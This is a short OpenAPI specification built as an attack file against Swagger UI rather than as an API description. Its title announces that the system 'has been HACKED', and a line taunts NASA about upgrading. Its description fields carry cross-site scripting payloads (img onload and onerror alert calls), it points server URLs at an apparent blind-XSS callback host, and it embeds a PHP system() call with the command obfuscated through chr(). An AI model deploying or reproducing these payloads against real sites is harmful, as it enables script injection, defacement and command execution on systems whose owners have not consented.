openapi: 3.0.0
info:
  title: Your system has been HACKED!
  description: Never trust anyone ![down](https://upload.wikimedia.org/wikipedia/commons/b/bb/Anonymous.jpg). [Click here to get rewards!](https://nasa.gov) or HTML.<img src onload=alert()/>
  version: Hei, NASA. You should upgrade to higher version of SwaggerUI.

servers:
  - url: https://paktiko.bxss.in
    description: <img src=x onerror="alert('XSS')">
  - url: https://paktiko.bxss.in
    description: <?php echo system(chr(0x6c).chr(0x73)); ?/>
    
